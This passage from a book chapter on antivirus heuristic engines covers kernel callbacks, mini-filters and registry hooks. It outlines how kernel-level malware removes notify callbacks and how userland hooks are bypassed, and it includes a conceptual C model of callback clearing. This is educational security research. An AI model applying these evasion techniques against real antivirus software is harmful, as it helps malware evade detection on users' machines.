Kernel drivers call these functions not only to build heuristic engines but also to analyze programs before they are executed or loaded. From a userland program, unlike with the previous hooking engines, there is no way of bypassing or even getting information about the installed callbacks. However, a malware program running at kernel level can. I will illustrate with a typical example:

1. The malware installs a driver or abuses a kernel-level vulnerability to run its code at Ring-0.

2. The malware gets a pointer to the (undocumented) PspCreateProcessNotifyRoutine.

3. Then, the malware removes all registered callbacks for this routine.

4. The true malicious programs, which are not being monitored, are executed.

However, first the program needs to execute code at kernel level; otherwise, it would be unable to remove any of the registered callbacks. An example of removing kernel callbacks is illustrated by this blog post by Daniel Pistelli: http://rcecafe.net/?p=116.
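To see why clearing the callback list blinds the monitoring driver, consider the following user-mode model. It is purely conceptual: the table layout, capacity, and function names are hypothetical and do not reflect the real, undocumented kernel structures.

```c
#include <stddef.h>

enum { MAX_NOTIFY_ROUTINES = 8 };   /* illustrative capacity only */

typedef void (*NotifyRoutine)(int pid, int created);

typedef struct {
    NotifyRoutine slots[MAX_NOTIFY_ROUTINES];
} NotifyTable;

/* Store fn in the first free slot; returns 0 on success, -1 if full. */
int notify_register(NotifyTable *t, NotifyRoutine fn)
{
    for (size_t i = 0; i < MAX_NOTIFY_ROUTINES; i++) {
        if (t->slots[i] == NULL) {
            t->slots[i] = fn;
            return 0;
        }
    }
    return -1;
}

/* Call every registered routine; returns how many were invoked. */
int notify_dispatch(const NotifyTable *t, int pid, int created)
{
    int called = 0;
    for (size_t i = 0; i < MAX_NOTIFY_ROUTINES; i++) {
        if (t->slots[i] != NULL) {
            t->slots[i](pid, created);
            called++;
        }
    }
    return called;
}

/* Empty every slot, which models the callback-removal step in the list above. */
void notify_clear_all(NotifyTable *t)
{
    for (size_t i = 0; i < MAX_NOTIFY_ROUTINES; i++)
        t->slots[i] = NULL;
}

/* Stand-in for an antivirus driver's monitoring callback. */
int g_events_seen = 0;

void sample_monitor(int pid, int created)
{
    (void)pid;
    (void)created;
    g_events_seen++;
}
```

In this model, a process-creation event dispatched after `notify_clear_all` reaches no callback at all, so `g_events_seen` stops increasing. The monitoring code is still loaded, but nothing ever calls it.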

At kernel level, there are more hooks, or callbacks, that can be registered to monitor anything the computer is doing. These hooks are typically used in kernel-level heuristic engines. It is common to see filesystem and registry hooks monitoring (as well as denying or allowing, depending on a set of rules that can be either hard-coded or dynamic) what is happening in the filesystem or registry. This is often done using mini-filters for filesystems. A mini-filter is a kernel-mode driver that exposes functionality that can be used to monitor and log any I/O and transaction activity that occurs in the system. It can, for example, examine files before they are actually opened, written to, or read from. Again, from a userland process, there is nothing malware can do; however, from a kernel-land driver, malware can do its work at an IRQL above PASSIVE_LEVEL (where the mini-filter will work), such as APC_LEVEL (asynchronous procedure calls) or DISPATCH_LEVEL (where deferred procedure calls happen), or even above that.

Returning to hooking registry activity, antivirus software can register a registry callback routine via CmRegisterCallback. The RegistryCallback routine receives notifications of each registry operation before the configuration manager processes the operation. Yet again, there is nothing a userland program can do from user-space to detect and bypass callbacks at kernel level; it will need kernel-level execution in order to do so. Malware or any other kernel-level program can remove the callbacks, as explained in the case of the PsSetCreateProcessNotifyRoutine, and then continue to do whatever it wants with the registry without being intercepted by an antivirus kernel-driver (see Figure 9.3).

Table presenting a list of IRQLs, with five columns, from left to right, labeled IRQL, X86 IRQL Value, AMD64 IRQL Value, IA64 IRQL Value, and Description, respectively.

Figure 9.3 List of IRQLs

Summary

This chapter covered the various types of heuristic engines that may be implemented in userland, kernel-land, or both. For each type of heuristic engine, this chapter also covered various methods on how to bypass these heuristic-based detections.

In summary, the following topics were covered:

· Heuristic engines, as implemented in AV products, rely on detection routines that assess evidence and behavior as collected from analyzing the code in question statically or dynamically.

· Static heuristic engines try to discover malicious software by finding evidence statically, by disassembling or analyzing the headers of the file under scrutiny. It is common to use heuristic engines that are based on machine learning algorithms, such as Bayesian networks or genetic algorithms, or on expert systems. Most often, static heuristic engines are considered true heuristic engines, while dynamic heuristic engines are called Host Intrusion Prevention Systems (HIPS).

· Heuristic engines based on expert systems implement a set of algorithms that emulate the decision-making strategy of a human analyst.

· Dynamic heuristic engines also base their detections on the behavior of the file or program by hooking API calls or executing the program under an emulation framework.

· Dynamic heuristic engines are implemented in the form of hooks (in userland or kernel-land). They could also be based on emulation (in the case of static analysis).

· Dynamic heuristic engines using userland hooks work by detouring some APIs to monitor the execution of those APIs and block them if needed. These userland hooks are usually implemented with the help of third-party hooking libraries such as EasyHook, Microsoft's Detours, or madCodeHook, among others.

· Bypassing userland hooks is easy in many ways. For instance, attackers could read the original prologue of the hooked functions from the disk, execute those bytes, then continue executing the part of the function past the prologue bytes (which are not hooked). Another simple approach is to unload the hooking library, which, in turn, will remove the hooks as it unloads.

· Kernel-land-based hooks rely on registering callbacks that monitor the creation of processes and access to the system registry. They also employ filesystem filter drivers for real-time file activity monitoring.

· Similarly to bypassing userland hooks, kernel-land hooks can be uninstalled by malicious code running in the kernel.

· The third type of heuristic engines is implemented by using both user-land and kernel-land hooks.

This chapter concludes this part of the book and paves the way for the next part, which covers attacking the antivirus software as a whole by identifying the attack vectors (local or remote) and then finding and exploiting bugs.